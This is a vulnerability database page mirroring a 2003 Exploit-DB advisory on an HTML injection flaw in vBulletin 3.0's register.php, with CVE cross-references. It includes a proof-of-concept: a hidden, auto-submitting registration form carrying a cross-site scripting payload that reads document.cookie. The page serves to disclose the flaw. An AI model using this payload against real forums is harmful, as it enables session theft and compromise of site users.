Lucene search
+L

vBulletin 3.0 - 'register.php' HTML Injection

🗓️ 06 Aug 2003 00:00:00Reported by Ferruh MavitunaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

vBulletin 3.0 has an HTML injection vulnerability via insufficient sanitization in register.php.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-1031
22 Jan 200405:00
cve
cvelist
Cvelist
CVE-2003-1031
22 Jan 200405:00
cvelist
euvd
EUVD
EUVD-2003-1021
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1031
17 Feb 200405:00
nvd
redhatcve
RedhatCVE
CVE-2003-1031
9 Jan 202611:37
redhatcve
source: https://www.securityfocus.com/bid/8354/info

vBulletin may be prone to an HTML injection vulnerability. This issue is exposed through inadequate sanitization of user input for certain fields within the register.php script. An attacker may exploit this issue by including hostile HTML and script code in fields that may be displayed in posts to the message board, or the user's profile. This code may be rendered in the web browser of a user who views the malicious message.

[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<>)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01394
27